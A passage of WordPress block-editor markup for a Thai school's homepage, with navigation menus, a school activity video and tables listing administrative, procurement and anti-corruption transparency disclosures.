class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT 2</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/